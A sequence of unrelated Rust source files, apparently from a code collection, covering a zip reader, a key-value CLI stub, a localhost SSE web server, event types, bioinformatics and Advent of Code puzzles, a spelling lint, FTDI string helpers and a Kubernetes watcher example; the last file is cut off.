        // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        let mut res = Self {
            dir: d,
            dir64: d64_info.map(|(_offset, record)| record),
            start_skip_len: 0,
        };
        // did we find a valid offset?
        if (0..size).contains(&computed_directory_offset) {
            // that's different from the recorded one?
            if computed_directory_offset != res.directory_offset() {
                // then assume `start_skip_len` padding
                res.start_skip_len = computed_directory_offset - res.directory_offset();
                res.set_directory_offset(computed_directory_offset);
            }
        }
        // make sure directory_offset points to somewhere in our file
        if !(0..size).contains(&res.directory_offset()) {
            return Err(FormatError::DirectoryOffsetPointsOutsideFile.into());
        }
        Ok(res)
    }

    /// The effective central-directory offset (zip64 wins when present).
    pub(crate) fn directory_offset(&self) -> usize {
        match self.dir64.as_ref() {
            Some(d64) => d64.directory_offset as usize,
            None => self.dir.directory_offset as usize,
        }
    }

    /// Overwrites the effective offset in whichever record is authoritative.
    pub(crate) fn set_directory_offset(&mut self, offset: usize) {
        match self.dir64.as_mut() {
            Some(d64) => d64.directory_offset = offset as u64,
            None => self.dir.directory_offset = offset as u32,
        };
    }
}
/// Raw bytes of a name or comment from a zip archive; not guaranteed UTF-8.
pub struct ZipString(pub Vec<u8>);
impl fmt::Debug for ZipString {
    /// Renders as a quoted string when valid UTF-8, otherwise as hex bytes.
    fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
        if let Ok(text) = std::str::from_utf8(&self.0) {
            write!(f, "{:?}", text)
        } else {
            write!(f, "[non-utf8 string: {:x}]", HexFmt(&self.0))
        }
    }
}
#[allow(unused)]
/// Reads zip archive structure from any positioned (`ReadAt`) source of
/// known total size.
pub struct ZipReader<'a, R>
where
    R: ReadAt,
{
    /// Positioned reader over the raw archive bytes.
    pub(crate) reader: &'a R,
    /// Total size of the archive, in bytes.
    pub(crate) size: usize,
}
impl<'a, R> ZipReader<'a, R>
where
    R: ReadAt,
{
    /// Creates a reader over `size` bytes of `reader`, validating the
    /// archive's end-of-central-directory records up front so invalid
    /// input fails early.
    pub fn new(reader: &'a R, size: usize) -> Result<Self, Error> {
        // Parse (and discard) the directory records. The previous debug
        // `println!` of the parsed structure was a leftover and is removed
        // so library users don't get stray stdout output.
        let _directory_end = super::parser::EndOfCentralDirectory::read(reader, size)?;
        Ok(Self { reader, size })
    }

    /// Lists the archive's entries. Not implemented yet.
    pub fn entries(&self) -> &[ZipEntry<'a>] {
        unimplemented!()
    }
}
/// A single entry (file or directory) inside a zip archive.
pub struct ZipEntry<'a> {
    // Entry name as stored in the central directory.
    name: &'a str,
}
impl<'a> ZipEntry<'a> {
    /// Returns the entry's name.
    pub fn name(&self) -> &'a str {
        self.name
    }
}
|
use clap::{App, Arg};
use std::process::exit;
/// CLI front-end for the key-value store: parses `set`/`get`/`rm`
/// subcommands. All subcommands are currently stubs that exit non-zero.
fn main() {
    // Every subcommand takes a positional KEY argument.
    let key_arg = || Arg::with_name("KEY").index(1).required(true);
    let matches = App::new(env!("CARGO_PKG_NAME"))
        .version(env!("CARGO_PKG_VERSION"))
        .author(env!("CARGO_PKG_AUTHORS"))
        .about(env!("CARGO_PKG_DESCRIPTION"))
        .subcommand(
            App::new("set")
                .about("set a key-value pair to the kvs")
                .args(&[key_arg(), Arg::with_name("VALUE").index(2).required(true)]),
        )
        .subcommand(
            App::new("get")
                .about("get a key-value pair from the kvs")
                .arg(key_arg()),
        )
        .subcommand(
            App::new("rm")
                .about("remove a key-value pair from the kvs")
                .arg(key_arg()),
        )
        .get_matches();
    match matches.subcommand() {
        ("set", Some(sub)) => {
            let _key = sub.value_of("KEY").unwrap();
            let _value = sub.value_of("VALUE").unwrap();
            eprintln!("unimplemented");
            exit(1);
        }
        // `get` and `rm` share the same stub behavior.
        ("get", Some(sub)) | ("rm", Some(sub)) => {
            let _key = sub.value_of("KEY").unwrap();
            eprintln!("unimplemented");
            exit(1);
        }
        _ => {
            exit(1);
        }
    }
}
|
mod vector;
mod string;
mod hash_maps;
mod averages;
mod pig_latin;
mod employeeAdder;
/// Entry point for the chapter exercises; currently runs only the
/// employee-adder exercise. The other exercises (vectors, strings,
/// hash maps, averages, pig latin) remain available via their modules.
fn main() {
    // A large body of commented-out scratch code exercising the other
    // modules was removed; see version control history if needed again.
    employeeAdder::run();
}
|
//! UI Simulation for handheld device with LCD and switchable keyboard layouts
use std::io::Read;
use std::net::{TcpListener, TcpStream};
use std::sync::mpsc;
use std::thread;
mod http;
mod mq;
use mq::{EventLoopRx, EventLoopTx, Message, SseRx};
const WEB_SERVER_BIND: &str = "127.0.0.1:8000";
const WEB_SERVER_THREADS: usize = 3;
/// Main: Spawn server threads, start event loop to route messages.
/// Channel Message Queue Plan:
/// 1. Inbound Channel: Server threads each get a moved clone of inbound
/// channel's Sender. Servers share inbound queue connected to event loop's
/// single Receiver.
/// 2. Outbound messages are broadcast to server threads, subject to
/// per-channel flow control as requested by server threads.
/// 3. Outbound Channels: Because Receivers cannot be cloned, event loop uses
/// separate outbound channel for each server. Event loop thread keeps
/// ownership of Senders. Receivers are moved to server threads.
fn main() {
    // Shared inbound channel (server threads -> event loop) plus the listener
    let (in_tx, in_rx) = mpsc::channel::<Message>();
    let listener = TcpListener::bind(WEB_SERVER_BIND).unwrap();
    let mut loop_to_server_mqs = Vec::<mq::Mq>::new();
    for thread_id in 0..WEB_SERVER_THREADS {
        // Dedicated outbound channel (event loop -> this server thread)
        let (to_server_tx, to_server_rx) = mpsc::channel::<Message>();
        loop_to_server_mqs.push(mq::Mq::new(to_server_tx, false, thread_id as u32));
        // Each server thread owns a clone of the inbound Sender and listener
        let thread_in_tx = in_tx.clone();
        let thread_listener = listener.try_clone().unwrap();
        let _ = thread::spawn(move || {
            let mq = mq::Mq::new(thread_in_tx, true, thread_id as u32);
            let mut sse_rx = to_server_rx as SseRx;
            mq.info(&format!(
                "Server {} ready: http://{}",
                thread_id, WEB_SERVER_BIND
            ));
            web_server(&mq, &mut sse_rx, thread_listener);
        });
    }
    // The event loop runs on the main thread until the inbound channel closes
    event_loop(
        in_rx as EventLoopRx,
        in_tx as EventLoopTx,
        &mut loop_to_server_mqs,
    );
}
/// Event loop for main thread.
///
/// Routes each inbound `Message`: log messages go to stdout, keyboard
/// messages are re-queued for the next processing stage, and Remote*
/// messages are broadcast to every server thread for SSE delivery.
fn event_loop(in_rx: EventLoopRx, in_tx: EventLoopTx, mqs_to_servers: &mut Vec<mq::Mq>) {
    // Re-queue a message onto our own inbound channel. Send errors are
    // ignored: they only occur during shutdown when receivers are gone.
    let loopback = |msg| {
        let _ = in_tx.send(msg);
    };
    // Blocks until every Sender has been dropped.
    for message in in_rx.iter() {
        match message {
            Message::LogError(msg) => println!("ERR: {}", msg),
            Message::LogInfo(msg) => println!("{}", msg),
            Message::KbdScanCode(sc) => {
                // TODO: route to keyboard driver
                loopback(Message::KbdUnicode(sc.clone()));
                loopback(Message::RemoteTrace(format!("KbdScanCode {}", sc)));
                println!("KbdScanCode: {}", sc);
            }
            Message::KbdUnicode(text) => {
                // TODO: route to UI view controller
                loopback(Message::RemoteTerm(text.clone()));
                loopback(Message::RemoteTrace(format!("KbdUnicode {}", text)));
                println!("KbdUnicode: {}", text);
            }
            Message::RemoteTrace(msg) => {
                // Broadcast to all server threads
                for mq in mqs_to_servers.iter_mut() {
                    mq.send(Message::RemoteTrace(msg.clone())); // to webserver SSE
                }
                println!("RemoteTrace: {}", msg);
            }
            Message::RemoteTerm(msg) => {
                // Broadcast to all server threads
                for mq in mqs_to_servers.iter_mut() {
                    mq.send(Message::RemoteTerm(msg.clone())); // to webserver SSE
                }
                println!("RemoteTerm: {}", msg);
            }
            Message::TxReady(ready, tid) => {
                // Flow control: only the matching thread's queue is updated
                for mq in mqs_to_servers.iter_mut() {
                    if mq.tid() == tid {
                        mq.set_tx_ready(ready);
                    }
                }
                println!("TxReady: {} {}", ready, tid);
            }
        }
    }
}
/// HTTP/1.1 web server handling one request per connection (no keep-alive).
fn web_server(mq: &mq::Mq, mut sse_rx: &mut SseRx, listener: TcpListener) {
    // Accept loop: each connection is handled to completion on this thread.
    for incoming in listener.incoming() {
        match incoming {
            Ok(stream) => handle_connect(&mq, &mut sse_rx, stream),
            Err(e) => mq.error(&format!("web_server() .incoming() [{}]", e)),
        }
    }
}
/// Attempt to read an HTTP header from the TcpStream.
///
/// The header may arrive split across several reads, so keep reading until
/// a blank line (header terminator) shows up, EOF, a read error, or the
/// attempt limit.
fn handle_connect(mq: &mq::Mq, mut sse_rx: &mut SseRx, mut stream: TcpStream) {
    let mut request_buf = [0; 3000];
    let max_attempts = 20;
    // Assume the header is oversized/incomplete until the terminator is
    // actually seen. (Previously this was initialized to `false` and never
    // set `true`, which made the too-big branch below unreachable.)
    let mut header_too_big = true;
    let mut tail = 0;
    // Allow for possibility of header split across multiple reads.
    for _ in 0..max_attempts {
        match stream.read(&mut request_buf[tail..]) {
            // EOF, or the buffer is full: no more data will arrive.
            Ok(0) => break,
            Ok(bytes_read) => {
                tail += bytes_read;
                if contains_blank_line(&request_buf[..tail]) {
                    header_too_big = false;
                    break;
                }
            }
            Err(e) => {
                mq.error(&format!("handle_connect() .read() [{}]", e));
                break;
            }
        }
    }
    if header_too_big {
        mq.error(&"handle_connect(): header too big; closing connection");
    } else {
        match std::str::from_utf8(&request_buf[0..tail]) {
            Ok(request) => handle_request(&mq, &mut sse_rx, stream, request),
            Err(e) => mq.error(&format!("handle_connection() ::from_utf8() [{}]", e)),
        }
    }
}
/// Test if byte array contains a blank line
/// For manual requests with netcat, use `nc -c ...` to make CRLF line endings.
fn contains_blank_line(buf: &[u8]) -> bool {
    // "\r\n\r\n" marks the end of an HTTP header.
    buf.windows(4).any(|window| window == b"\r\n\r\n")
}
/// Handle an HTTP request (possible: GET, HEAD, POST, or 501)
/// Potential surprises:
/// 1. This checks only first line of header. Discarding remainder of
///    request creates requirement to pass POST data in a ?query_string.
///    POSTing path with query is valid HTTP/1.1 and useful for this
///    purpose, but it does not obey conventions for HTML forms.
/// 2. This omits all header based security checks. As long as this server
///    only binds to localhost, skipping the checks should be fine.
fn handle_request(mq: &mq::Mq, mut sse_rx: &mut SseRx, stream: TcpStream, request: &str) {
    // Request line: "<METHOD> <PATH> <PROTOCOL>"
    let first_line = request.lines().next().unwrap_or(&"").trim();
    let mut parts = first_line.split(' ');
    let method = parts.next().unwrap_or(&"");
    let full_path = parts.next().unwrap_or(&"");
    let protocol = parts.next().unwrap_or(&"");
    // The three supported methods share one code path; anything else is 501.
    match (method, protocol) {
        ("GET", "HTTP/1.1") | ("HEAD", "HTTP/1.1") | ("POST", "HTTP/1.1") => {
            let mut r = http::Request::new(mq, &stream, &method, &full_path);
            handle_route(&mut r, &mut sse_rx);
        }
        _ => http::send_501(&mq, stream, &first_line),
    }
}
/// Handle HTTP request for GET/HEAD/POST.
/// Possible surprise:
/// - Keyscan endpoint expects POST to /io/kbd/scancode?query where entire query
///   after "?" is scancode (not multipart/form-data in body, nor ?key=value).
///   This is valid by HTTP spec but does not follow HTML form conventions.
///   Example JS:
///     for (const k of ['P13p', 'P13r', 'P14p', 'P14r']) {
///       fetch('http://localhost:8000/io/kbd/scancode?'+k, {method: 'POST'});
///     }
fn handle_route(mut r: &mut http::Request, mut sse_rx: &mut SseRx) {
    match r.method {
        // Static assets plus the long-lived SSE screen endpoint.
        "HEAD" | "GET" => match r.path {
            "/" => http::send_file(&mut r, &"www/index.html"),
            "/main.js" => http::send_file(&mut r, &"www/main.js"),
            "/bkit.js" => http::send_file(&mut r, &"www/bkit.js"),
            "/bkbd.js" => http::send_file(&mut r, &"www/bkbd.js"),
            "/style.css" => http::send_file(&mut r, &"www/style.css"),
            "/io/screen" => handle_io_screen(&mut r, &mut sse_rx),
            _ => http::send_404(&mut r),
        },
        // Keyboard scancode injection (scancode carried in the query string).
        "POST" => match (r.path, r.query) {
            ("/io/kbd/scancode", sc) => handle_io_scancode(&mut r, sc),
            _ => http::send_404(&mut r),
        },
        _ => http::send_404(&mut r),
    }
}
/// Handle GET request for /io/screen with Server Sent Events (SSE). This will
/// pipe messages received from message queue to a long-lived connection that
/// follows HTTP SSE protocol and generates javascript events on client side.
fn handle_io_screen(mut r: &mut http::Request, mut sse_mq: &mut SseRx) {
    // Blocks for the lifetime of the SSE connection.
    http::send_sse_piped_events(&mut r, &mut sse_mq);
}
/// Handle POST request for a keyboard scancode
fn handle_io_scancode(mut r: &mut http::Request, scancode: &str) {
    // Valid scancodes are exactly four characters (e.g. "P13p").
    if scancode.len() != 4 {
        http::send_400(&mut r, &"Bad Scancode");
        return;
    }
    r.mq.kbd_scancode(scancode);
    http::send_200(&mut r, http::TEXT_PLAIN, &"OK");
}
|
use serde::{Deserialize, Serialize};
use common::event::{Event, ToEvent};
use common::result::Result;
use crate::util;
#[derive(Serialize, Deserialize, Debug)]
/// Domain events emitted by the user aggregate; each variant carries the
/// payload published alongside the event.
pub enum UserEvent {
    /// A new account was created and awaits validation.
    Registered {
        id: String,
        username: String,
        email: String,
        validation_code: String,
    },
    /// A user authenticated successfully.
    LoggedIn {
        id: String,
        auth_token: String,
    },
    /// Profile data changed.
    Updated {
        id: String,
        name: String,
        lastname: String,
    },
    /// The account's validation code was confirmed.
    Validated {
        id: String,
    },
    /// A temporary password was issued for account recovery.
    PasswordRecoveryRequested {
        id: String,
        temp_password: String,
        email: String,
    },
    /// The account was removed.
    Deleted {
        id: String,
    },
}
impl ToString for UserEvent {
    /// Kebab-case event code for each variant, used as the event name.
    fn to_string(&self) -> String {
        let code = match self {
            UserEvent::Registered { .. } => "registered",
            UserEvent::LoggedIn { .. } => "logged-in",
            UserEvent::Updated { .. } => "updated",
            UserEvent::Validated { .. } => "validated",
            UserEvent::PasswordRecoveryRequested { .. } => "password-recovery-requested",
            UserEvent::Deleted { .. } => "deleted",
        };
        code.to_owned()
    }
}
impl ToEvent for UserEvent {
    /// Serializes the event payload and wraps it in a generic `Event`
    /// under the "user" topic, named by `to_string()`.
    fn to_event(&self) -> Result<Event> {
        let payload = util::serialize(&self, "user")?;
        Ok(Event::new("user".to_owned(), self.to_string(), payload))
    }
}
|
// Given: At most 10 DNA strings in FASTA format (of length at most 1 kbp each).
// Return: The ID of the string having the highest GC-content, followed by the GC-content of that string.
// Rosalind allows for a default error of 0.001 in all decimal answers
// unless otherwise stated; please see the note on absolute error below.
#![feature(io)]
#![feature(path)]
#![feature(core)]
#![feature(env)]
use std::env;
use std::old_io as io;
use std::old_io::File;
#[derive(Debug)]
/// One FASTA record: a `>`-prefixed label line plus its sequence data.
struct Fasta {
    label: String,
    content: String,
}
/// Reads a FASTA file (path from argv[1], default "rosalind_gc.txt") and
/// prints the label and GC percentage of the record with the highest
/// GC-content.
///
/// NOTE(review): this file uses pre-1.0 Rust APIs (`std::old_io`, `.desc`,
/// `as_slice()` patterns); it will not build on modern Rust.
fn main () {
    let args: Vec<String> = env::args().map(|x| x.to_string())
        .collect();
    // First CLI argument, when present, is the input path.
    let path = match args.as_slice() {
        [_, ref path] => Path::new(path),
        _ => Path::new("rosalind_gc.txt"),
    };
    let mut file = match File::open(&path) {
        Err(why) => panic!("couldn't open {}: {}", path.display(), why.desc),
        Ok(file) => file,
    };
    let content = match file.read_to_string() {
        Err(why) => panic!("couldn't read {}: {}", path.display(), why.desc),
        Ok(string) => string,
    };
    let input: &str = content.as_slice();
    let dnas = parse_fasta(input);
    // Track the running maximum; `<=` keeps the *last* record on ties.
    let mut max_name = "".to_string();
    let mut max_gc_content = 0.0;
    for dna in dnas {
        let gc_content = get_gc_content(&dna);
        if (max_gc_content <= gc_content) {
            max_name = dna.label;
            max_gc_content = gc_content;
        }
    }
    println!("{}\n{}", max_name, max_gc_content);
}
/// Percentage (0-100) of 'C'/'G' graphemes in the record's sequence.
/// NOTE(review): relies on the pre-1.0 built-in `graphemes()`; modern Rust
/// needs the unicode-segmentation crate (or `chars()` for ASCII FASTA).
fn get_gc_content(dna: &Fasta) -> f64 {
    let mut counter = 0;
    let size = dna.content.len();
    for c in dna.content.graphemes(true) {
        if c == "C" || c == "G" {
            counter += 1;
        }
    }
    (100 * counter) as f64/size as f64
}
/// Splits raw FASTA text on '>' and converts each chunk with both a label
/// line and sequence data into a `Fasta` record.
/// NOTE(review): `splitn(1, '\n')` uses old-Rust semantics (1 split =>
/// up to 2 pieces); under modern `splitn` the count would have to be 2.
fn parse_fasta(input: &str) -> Vec<Fasta> {
    let mut result: Vec<Fasta> = Vec::new();
    let codes: Vec<&str> = input.split('>').collect();
    for c in codes {
        // tokens[0] = label line, tokens[1] = remaining sequence lines
        let tokens: Vec<&str> = c.splitn(1, '\n').collect();
        if tokens.len() == 2 {
            let res = vec_to_fasta(tokens);
            result.push(res);
        }
    }
    result
}
/// Builds a `Fasta` from `[label_line, sequence_text]`, stripping the
/// newlines that separate sequence lines.
fn vec_to_fasta(vec: Vec<&str>) -> Fasta {
    Fasta {
        label: vec[0].to_string(),
        content: vec[1].replace("\n", ""),
    }
}
|
use crate::{Backend, Entity, Repository};
use twilight_model::{
gateway::{
presence::{Activity, ClientStatus, Presence, Status, UserOrId},
payload::PresenceUpdate,
},
id::{GuildId, UserId},
};
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize))]
#[derive(Clone, Debug, Eq, PartialEq)]
/// Cacheable form of a member's presence, keyed by (guild, user).
pub struct PresenceEntity {
    pub activities: Vec<Activity>,
    pub client_status: ClientStatus,
    pub guild_id: GuildId,
    pub status: Status,
    pub user_id: UserId,
}
impl From<Presence> for PresenceEntity {
    /// Flattens a gateway `Presence` into its cacheable form.
    fn from(presence: Presence) -> Self {
        // The gateway sends either a full user object or a bare ID.
        let user_id = match &presence.user {
            UserOrId::User(user) => user.id,
            UserOrId::UserId { id } => *id,
        };
        Self {
            user_id,
            activities: presence.activities,
            client_status: presence.client_status,
            guild_id: presence.guild_id,
            status: presence.status,
        }
    }
}
impl From<PresenceUpdate> for PresenceEntity {
fn from(mut presence: PresenceUpdate) -> Self {
let mut activities = Vec::new();
if let Some(game) = presence.game {
activities.push(game);
}
activities.append(&mut presence.activities);
let user_id = match presence.user {
UserOrId::User(user) => user.id,
UserOrId::UserId { id } => id,
};
Self {
activities,
client_status: presence.client_status,
guild_id: presence.guild_id,
status: presence.status,
user_id,
}
}
}
impl Entity for PresenceEntity {
    type Id = (GuildId, UserId);
    /// Return an ID consisting of a tuple of the guild ID and user ID.
    fn id(&self) -> Self::Id {
        (self.guild_id, self.user_id)
    }
}
/// Repository of presences for a given cache backend.
pub trait PresenceRepository<B: Backend>: Repository<PresenceEntity, B> {}
|
use std::collections::VecDeque;
use std::time::Instant;
const INPUT: &str = include_str!("../input.txt");
fn simulate(steps: usize) -> usize {
let mut fish: VecDeque<usize> = VecDeque::from([0; 9]);
for f in INPUT
.lines()
.next()
.unwrap()
.split(',')
.map(|n| n.parse::<usize>().unwrap())
{
fish[f] += 1;
}
for _ in 0..steps {
fish.rotate_left(1);
fish[6] += fish[8];
}
fish.iter().sum()
}
/// Puzzle part 1: population after 80 days.
fn part1() -> usize {
    simulate(80)
}
/// Puzzle part 2: population after 256 days.
fn part2() -> usize {
    simulate(256)
}
/// Runs both puzzle parts and reports wall-clock timing for each.
fn main() {
    let timer = Instant::now();
    println!("part 1: {}", part1());
    println!("part 1 took {}ms", timer.elapsed().as_millis());
    let timer = Instant::now();
    println!("part 2: {}", part2());
    println!("part 2 took {}ms", timer.elapsed().as_millis());
}
#[cfg(test)]
mod tests {
    use super::*;
    // Expected values are the accepted puzzle answers for this input file.
    #[test]
    fn test_part1() {
        assert_eq!(part1(), 386536);
    }
    #[test]
    fn test_part2() {
        assert_eq!(part2(), 1732821262171);
    }
}
|
pub mod fstab;
pub mod sources;
use self::fstab::FstabError;
use self::sources::SourcesError;
use ubuntu_version::{Codename, Version, VersionError};
#[derive(Debug, Error)]
pub enum RepairError {
#[error(display = "error checking and fixing fstab: {}", _0)]
Fstab(FstabError),
#[error(display = "version is not an ubuntu codename: {}", _0)]
InvalidVersion(String),
#[error(display = "failed to fetch release versions: {}", _0)]
ReleaseVersion(VersionError),
#[error(display = "error checkig and fixing sources: {}", _0)]
Sources(SourcesError),
}
/// Runs all release repair steps: detects the installed Ubuntu version,
/// then repairs /etc/fstab and the apt sources for that codename.
pub fn repair() -> Result<(), RepairError> {
    info!("performing release repair");
    let codename: Codename = Version::detect().map_err(RepairError::ReleaseVersion)?.into();
    fstab::repair().map_err(RepairError::Fstab)?;
    sources::repair(codename).map_err(RepairError::Sources)?;
    Ok(())
}
|
use markdown;
use rustc::hir;
use rustc::lint::{LateContext, LintContext, LintPass, LateLintPass, LintArray};
use syntax_pos::Span;
use syntax::ast;
use syntax::attr;
use ispell::{SpellLauncher, SpellChecker};
use markdown::{Block, Span as MdSpan};
use helpers::to_text_block;
declare_lint!(SPELLING_ERROR, Warn, "Warn about spelling errors.");
/// Lint pass state: tracks `#[doc(hidden)]` scoping while walking the crate.
pub struct SpellingError {
    // /// Stack of IDs of struct definitions.
    // struct_def_stack: Vec<ast::NodeId>,
    /// Stack of whether #[doc(hidden)] is set
    /// at each level which has lint attributes.
    doc_hidden_stack: Vec<bool>,
}
impl LintPass for SpellingError {
    /// Registers the single lint this pass provides.
    fn get_lints(&self) -> LintArray {
        lint_array!(SPELLING_ERROR)
    }
}
impl SpellingError {
    /// Creates the pass with an initial, non-hidden documentation scope.
    pub fn new() -> SpellingError {
        SpellingError {
            // struct_def_stack: vec![],
            doc_hidden_stack: vec![false],
        }
    }

    /// Whether the innermost lint-attribute scope is `#[doc(hidden)]`.
    fn doc_hidden(&self) -> bool {
        *self.doc_hidden_stack.last().expect("empty doc_hidden_stack")
    }

    /// Spell-checks all text inside one markdown block.
    /// (Renamed from the misspelled `travserse_markdown_block`.)
    fn traverse_markdown_block(checker: &mut SpellChecker, cx: &LateContext, sp: Span, block: &Block) {
        match *block {
            Block::Header(ref spans, _) => {
                for span in spans {
                    Self::traverse_markdown_span(checker, cx, sp, span);
                }
            },
            Block::Paragraph(ref spans) => {
                for span in spans {
                    Self::traverse_markdown_span(checker, cx, sp, span);
                }
            }
            Block::Blockquote(_) => {}, // TODO
            // Code blocks are deliberately not spell-checked.
            Block::CodeBlock(_) => (),
            Block::UnorderedList(_) => {}, // TODO
            Block::Raw(_) => {}, // TODO
            Block::Hr => {},
        }
    }

    /// Spell-checks the plain-text parts of one markdown span, recursing
    /// into emphasis/strong nesting.
    /// (Renamed from the misspelled `travserse_markdown_span`.)
    fn traverse_markdown_span(checker: &mut SpellChecker, cx: &LateContext, sp: Span, span: &MdSpan) {
        match *span {
            MdSpan::Break => (),
            MdSpan::Text(ref text) => {
                Self::check_text(checker, cx, sp, text.clone());
            },
            // Inline code is deliberately not spell-checked.
            MdSpan::Code(_) => (),
            MdSpan::Link(_, _, _) => {}, // TODO
            MdSpan::Image(_, _, _) => {}, // TODO: check alt text?
            MdSpan::Emphasis(ref spans) => {
                for span in spans {
                    Self::traverse_markdown_span(checker, cx, sp, span);
                }
            },
            MdSpan::Strong(ref spans) => {
                for span in spans {
                    Self::traverse_markdown_span(checker, cx, sp, span);
                }
            },
        }
    }

    /// Runs the spell checker over `test_text` and emits a lint for each
    /// misspelling that has at least one suggestion. Checker failures
    /// (e.g. aspell I/O errors) are silently ignored.
    fn check_text(checker: &mut SpellChecker, cx: &LateContext, sp: Span, test_text: String) {
        if let Ok(errors) = checker.check(&test_text) {
            for e in errors {
                if !e.suggestions.is_empty() {
                    cx.span_lint(SPELLING_ERROR,
                                 sp,
                                 &format!("'{}' is misspelled. Maybe you meant '{}'",
                                          &e.misspelled,
                                          &e.suggestions[0]
                                 ));
                }
            }
        }
    }

    /// Spell-checks the doc comments attached to one (exported) item.
    fn check_spelling_errors(&self,
                             cx: &LateContext,
                             id: Option<ast::NodeId>,
                             attrs: &[ast::Attribute],
                             sp: Span) {
        // If we're building a test harness, then warning about
        // documentation is probably not really relevant right now.
        if cx.sess().opts.test {
            return;
        }
        // Only check publicly-visible items, using the result from the privacy pass.
        // It's an option so the crate root can also use this function (it doesn't
        // have a NodeId).
        if let Some(id) = id {
            if !cx.access_levels.is_exported(id) {
                return;
            }
        }
        // NOTE(review): a fresh aspell process is launched for every item
        // and `unwrap()` panics when aspell is unavailable; consider caching
        // the checker and degrading gracefully.
        let mut checker = SpellLauncher::new()
            .aspell()
            .dictionary("en")
            .timeout(1000)
            .launch()
            .unwrap();
        let text_block = to_text_block(attrs);
        let blocks = markdown::tokenize(&text_block);
        for block in &blocks {
            Self::traverse_markdown_block(&mut checker, cx, sp, block);
        }
    }
}
impl<'a, 'tcx> LateLintPass<'a, 'tcx> for SpellingError {
    /// Pushes the `#[doc(hidden)]` state for a new lint-attribute scope;
    /// hidden-ness is inherited from the enclosing scope.
    fn enter_lint_attrs(&mut self, _: &LateContext, attrs: &[ast::Attribute]) {
        let doc_hidden = self.doc_hidden() ||
                         attrs.iter().any(|attr| {
                             attr.check_name("doc") &&
                             match attr.meta_item_list() {
                                 None => false,
                                 Some(l) => attr::list_contains_name(&l[..], "hidden"),
                             }
                         });
        self.doc_hidden_stack.push(doc_hidden);
    }
    /// Pops the state pushed by `enter_lint_attrs`.
    fn exit_lint_attrs(&mut self, _: &LateContext, _attrs: &[ast::Attribute]) {
        self.doc_hidden_stack.pop().expect("empty doc_hidden_stack");
    }
    // fn check_struct_def(&mut self,
    //                     _: &LateContext,
    //                     _: &hir::VariantData,
    //                     _: ast::Name,
    //                     _: &hir::Generics,
    //                     item_id: ast::NodeId) {
    //     self.struct_def_stack.push(item_id);
    // }
    //
    // fn check_struct_def_post(&mut self,
    //                          _: &LateContext,
    //                          _: &hir::VariantData,
    //                          _: ast::Name,
    //                          _: &hir::Generics,
    //                          item_id: ast::NodeId) {
    //     let popped = self.struct_def_stack.pop().expect("empty struct_def_stack");
    //     assert!(popped == item_id);
    // }
    /// Spell-checks the crate-level doc comments.
    fn check_crate(&mut self, cx: &LateContext, krate: &hir::Crate) {
        self.check_spelling_errors(cx, None, &krate.attrs, krate.span);
    }
    /// Spell-checks each item's doc comments.
    fn check_item(&mut self, cx: &LateContext, it: &hir::Item) {
        self.check_spelling_errors(cx, Some(it.id), &it.attrs, it.span);
    }
}
|
/// Zero-value constructor for the integer types FTDI strings use.
pub trait NumberBoilerplate {
    fn zero() -> Self;
}

impl NumberBoilerplate for i8 {
    fn zero() -> i8 {
        0i8
    }
}

impl NumberBoilerplate for u8 {
    fn zero() -> u8 {
        0u8
    }
}

// Converts an i8 or u8 slice into a string. Non UTF-8 will be lost.
//
// The FTDI strings have unique requirements:
// * They may contain interior nul bytes.
// * They might not be nul terminated.
pub fn slice_into_string<T>(array: &[T]) -> String
where
    T: NumberBoilerplate + std::cmp::PartialEq,
{
    // Treat the first nul as the terminator; absent one, take the whole slice.
    let end = array
        .iter()
        .position(|element| *element == NumberBoilerplate::zero())
        .unwrap_or(array.len());
    // Safety: The trait bounds for T are only implemented for u8 and i8,
    // which are equal size, and are therefore safe to transmute.
    debug_assert_eq!(std::mem::size_of::<T>(), std::mem::size_of::<u8>());
    String::from_utf8_lossy(unsafe { &*(&array[..end] as *const [T] as *const [u8]) }).to_string()
}
#[cfg(test)]
mod slice_into_string {
    use super::*;
    // No terminator in an empty slice: result is the empty string.
    #[test]
    fn empty() {
        let data: [i8; 0] = [];
        assert_eq!(slice_into_string(&data), String::from(""));
    }
    // Normal nul-terminated string.
    #[test]
    fn positive_path() {
        let data: [u8; 2] = [0x61, 0x00];
        assert_eq!(slice_into_string(&data), String::from("a"));
    }
    // Conversion stops at the first interior nul.
    #[test]
    fn interior_nul() {
        let data: [i8; 3] = [0x61, 0x00, 0x61];
        assert_eq!(slice_into_string(&data), String::from("a"));
    }
    // Without a nul the whole slice is converted.
    #[test]
    fn no_nul() {
        let data: [i8; 3] = [0x61; 3];
        assert_eq!(slice_into_string(&data), String::from("aaa"));
    }
    // Invalid UTF-8 is replaced with U+FFFD by the lossy conversion.
    #[test]
    fn non_utf8() {
        let data: [i8; 2] = [0xFEu8 as i8, 0x00];
        assert_eq!(slice_into_string(&data), String::from("�"));
    }
}
|
use futures::{pin_mut, TryStreamExt};
use k8s_openapi::api::core::v1::Node;
use kube::{
api::{Api, ResourceExt},
runtime::{predicates, reflector, watcher, WatchStreamExt},
Client,
};
use tracing::*;
#[tokio::main]
async fn main() -> anyhow::Result<()> {
    tracing_subscriber::fmt::init();
    let client = Client::try_default().await?;
    let nodes: Api<Node> = Api::all(client.clone());
    let watch_config = watcher::Config::default()
        .labels("kubernetes.io/arch=amd64") // filter instances by label
        .timeout(10); // short watch timeout in this example
    let (store_reader, store_writer) = reflector::store();
    let node_stream = reflector(store_writer, watcher(nodes, watch_config))
        .applied_objects()
        .predicate_filter(predicates::labels); // NB: requires an unstable feature
    // Periodically report the reflector's view of the cluster in the background
    tokio::spawn(async move {
        loop {
            let names: Vec<_> = store_reader.state().iter().map(|r| r.name_any()).collect();
            info!("Current {} nodes: {:?}", names.len(), names);
            tokio::time::sleep(std::time::Duration::from_secs(10)).await;
        }
    });
    // Log applied events with changes from the reflector
    pin_mut!(node_stream);
    while let Some(node) = node_stream.try_next().await? {
        info!("saw node {} with hitherto unseen labels", node.name_any());
    }
    Ok(())
}
|
#![allow(unused)]
use std::fs::File;
use std::io::Read;
use scan_fmt::*;
use std::{thread, time};
use ndarray::*;
/// AoC 2018 day 11: finds the 3x3 square of fuel cells with the largest
/// total power for the hard-coded grid serial number, then prints the
/// winning square.
fn main() {
    let serial_number: i32 = 5177;
    // Precompute the power level of every cell (coordinates are 1-based).
